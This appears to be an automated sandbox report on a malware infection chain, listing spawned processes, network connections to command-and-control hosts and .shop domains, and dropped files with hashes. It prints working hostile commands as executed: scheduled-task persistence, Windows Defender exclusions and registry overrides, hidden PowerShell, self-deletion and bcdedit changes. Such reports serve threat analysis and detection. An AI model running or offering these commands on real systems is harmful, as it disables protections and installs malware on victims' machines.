C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3508 -ip 3508

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 324

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe

"C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe

"C:\Users\Admin\Pictures\xjnaD54mKqxWV7zAZ1hff5hG.exe"

C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe

"C:\Users\Admin\Pictures\xVAK0BkGsduUJI732B5D7eYQ.exe" /s

C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe

"C:\Users\Admin\Pictures\A5G3oDww9dlDQhIDQ1jLUH46.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\360TS_Setup.exe

"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Users\Admin\Pictures\MpOzMRhOyGRYJYp2mJ9HJNR9.exe

"C:\Users\Admin\Pictures\MpOzMRhOyGRYJYp2mJ9HJNR9.exe"

C:\Users\Admin\AppData\Local\Temp\7zS49C1.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe

.\Install.exe /NQHxdidUQs "385118" /S

C:\Program Files (x86)\1716969192_0\360TS_Setup.exe

"C:\Program Files (x86)\1716969192_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 07:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe\" 1g /dsOdidRutz 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqGGCwwWIommTRgeuN

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqGGCwwWIommTRgeuN

C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS4BB5.tmp\Install.exe 1g /dsOdidRutz 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set {bootmgr} flightsigning on

C:\Windows\system32\bcdedit.exe

"C:\Windows\system32\bcdedit.exe" /set flightsigning on

Network

Country Destination Domain Proto
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 185.172.128.33:8970 tcp
RU 185.215.113.67:40960 tcp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
US 172.67.218.187:443 buttockdecarderwiso.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 104.21.62.60:443 averageaattractiionsl.shop tcp
US 172.67.141.63:443 femininiespywageg.shop tcp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 60.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 63.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 218.203.67.172.in-addr.arpa udp
US 104.21.49.245:443 civilianurinedtsraov.shop tcp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 104.21.55.248:443 patternapplauderw.shop tcp
DE 23.88.106.134:80 23.88.106.134 tcp
RU 5.42.65.67:48396 tcp
RU 77.221.151.47:80 tcp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
RU 185.215.113.67:40960 tcp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 104.21.25.251:443 deprivedrinkyfaiir.shop tcp
US 172.67.190.237:443 relaxtionflouwerwi.shop tcp
N/A 127.0.0.1:49866 tcp
N/A 127.0.0.1:49873 tcp
N/A 127.0.0.1:49876 tcp
N/A 127.0.0.1:49878 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 77.221.151.47:80 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 77.221.151.47:80 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
DE 207.180.242.32:443 areekat-aldeera.com tcp
US 104.21.235.69:443 iili.io tcp
US 104.21.79.77:443 yip.su tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.172.128.82:80 185.172.128.82 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
NL 151.236.127.172:443 iup.360safe.com tcp
US 104.21.235.69:443 iili.io tcp
RU 185.215.113.67:40960 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tr.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
FR 52.84.174.100:80 int.down.360safe.com tcp
FR 52.84.174.124:80 int.down.360safe.com tcp
FR 52.84.174.22:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
GB 85.192.56.26:80 85.192.56.26 tcp
FR 18.164.55.159:80 sd.p.360safe.com tcp
US 172.67.75.163:443 api.myip.com tcp
US 34.117.186.192:443 ipinfo.io tcp
RU 185.215.113.67:40960 tcp
FR 52.84.174.124:80 int.down.360safe.com tcp
FR 52.84.174.100:80 int.down.360safe.com tcp
FR 52.84.174.22:80 int.down.360safe.com tcp
FR 52.84.174.124:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.100:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.124:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.124:80 int.down.360safe.com tcp
FR 52.84.174.100:80 int.down.360safe.com tcp
FR 52.84.174.22:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.124:80 int.down.360safe.com tcp
FR 52.84.174.23:80 int.down.360safe.com tcp
FR 52.84.174.100:80 int.down.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
RU 185.215.113.67:40960 tcp
NL 82.145.215.152:443 orion.ts.360.com tcp
RU 185.215.113.67:40960 tcp
RU 185.215.113.67:40960 tcp

Files

memory/4248-0-0x00000000000C0000-0x000000000058E000-memory.dmp

memory/4248-1-0x0000000077946000-0x0000000077948000-memory.dmp

memory/4248-2-0x00000000000C1000-0x00000000000EF000-memory.dmp

memory/4248-3-0x00000000000C0000-0x000000000058E000-memory.dmp

memory/4248-5-0x00000000000C0000-0x000000000058E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

MD5 e9c43c9405c2823ac94cea6ffc1db64c
SHA1 949fb058c018c3a85eda4ef2de5b4634d639a9ef
SHA256 223f7f1d9b4dfc44b2d2382cd1f834bab5beedfca3de0966dcee37761363f231
SHA512 9f0b0112da9f60e151e705af1b479b5e657b2264a99db075dfc59172dbfdfa7cfaa921491a822e7a4fa9a586877b696ae03cb3c216a5c0fb51b717e13e49b5d2

memory/4372-18-0x0000000000940000-0x0000000000E0E000-memory.dmp

memory/4248-17-0x00000000000C0000-0x000000000058E000-memory.dmp

memory/4372-19-0x0000000000941000-0x000000000096F000-memory.dmp

memory/4372-20-0x0000000000940000-0x0000000000E0E000-memory.dmp

memory/4372-21-0x0000000000940000-0x0000000000E0E000-memory.dmp

memory/4372-22-0x0000000000940000-0x0000000000E0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe

MD5 cc7933b503e061ddde7158e108f19cc3
SHA1 41b74dc86cc1c4dde7010d3f596aacccf00b3133
SHA256 049f48024f31d86c5d8bf56c3da1d7be539c877ad189fb0c5aa9a228601d19eb
SHA512 87892a6f3e41ea43157cf13cc6402044ce41fd3d7eb7e456fced894c88d33786a80fa626c1b58436eba94997490256d2675598ba2e54b52affa64f5491c880a2

C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\stub.exe

MD5 5ad46542eebe9910891770d619d7c4fa
SHA1 38b3d062740d4a350c3329f4e5d7627e4a980ef3
SHA256 6b0281ff5ec47dfabd801ecde7e55513e556ca6763a557bfb8f2c07b0e739bd5
SHA512 426aa5a0453dc0ad2494d43fdfa7d6c35f19770026650db413234859c34e9a1371272942e96d8741594a47832c4fb4391c217911bc65c6434d621f01995d1e64

C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\python310.dll

MD5 c80b5cb43e5fe7948c3562c1fff1254e
SHA1 f73cb1fb9445c96ecd56b984a1822e502e71ab9d
SHA256 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20
SHA512 faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\vcruntime140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 87596db63925dbfe4d5f0f36394d7ab0
SHA1 ad1dd48bbc078fe0a2354c28cb33f92a7e64907e
SHA256 92d7954d9099762d81c1ae2836c11b6ba58c1883fde8eeefe387cc93f2f6afb4
SHA512 e6d63e6fe1c3bd79f1e39cb09b6f56589f0ee80fd4f4638002fe026752bfa65457982adbef13150fa2f36e68771262d9378971023e07a75d710026ed37e83d7b

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

MD5 b5fbc034ad7c70a2ad1eb34d08b36cf8
SHA1 4efe3f21be36095673d949cceac928e11522b29c
SHA256 80a6ebe46f43ffa93bbdbfc83e67d6f44a44055de1439b06e4dd2983cb243df6
SHA512 e7185da748502b645030c96d3345d75814ba5fd95a997c2d1c923d981c44d5b90db64faf77ddbbdc805769af1bec37daf0ecee0930a248b67a1c2d92b59c250c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_sqlite3.pyd

MD5 7f61eacbbba2ecf6bf4acf498fa52ce1
SHA1 3174913f971d031929c310b5e51872597d613606
SHA256 85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e
SHA512 a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\sqlite3.dll

MD5 926dc90bd9faf4efe1700564aa2a1700
SHA1 763e5af4be07444395c2ab11550c70ee59284e6d
SHA256 50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0
SHA512 a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\cryptography\hazmat\bindings\_rust.pyd

MD5 b364cecdba4b73c71116781b1c38d40f
SHA1 59ef6f46bd3f2ec17e78df8ee426d4648836255a
SHA256 10d009a3c97bf908961a19b4aaddc298d32959acc64bedf9d2a7f24c0261605b
SHA512 999c2da8e046c9f4103385c7d7dbb3bfdac883b6292dca9d67b36830b593f55ac14d6091eb15a41416c0bd65ac3d4a4a2b84f50d13906d36ed5574b275773ce7

C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\python3.dll

MD5 07bd9f1e651ad2409fd0b7d706be6071
SHA1 dfeb2221527474a681d6d8b16a5c378847c59d33
SHA256 5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5
SHA512 def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

C:\Users\Admin\AppData\Local\Temp\onefile_3908_133614426786502800\_socket.pyd

MD5 e137df498c120d6ac64ea1281bcab600
SHA1 b515e09868e9023d43991a05c113b2b662183cfe
SHA256 8046bf64e463d5aa38d13525891156131cf997c2e6cdf47527bc352f00f5c90a
SHA512 cc2772d282b81873aa7c5cba5939d232cceb6be0908b211edb18c25a17cbdb5072f102c0d6b7bc9b6b2f1f787b56ab1bc9be731bb9e98885c17e26a09c2beb90

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 35f66ad429cd636bcad858238c596828
SHA1 ad4534a266f77a9cdce7b97818531ce20364cb65
SHA256 58b772b53bfe898513c0eb264ae4fa47ed3d8f256bc8f70202356d20f9ecb6dc
SHA512 1cca8e6c3a21a8b05cc7518bd62c4e3f57937910f2a310e00f13f60f6a94728ef2004a2f4a3d133755139c3a45b252e6db76987b6b78bc8269a21ad5890356ad

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-1_1.dll

MD5 ab01c808bed8164133e5279595437d3d
SHA1 0f512756a8db22576ec2e20cf0cafec7786fb12b
SHA256 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55
SHA512 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

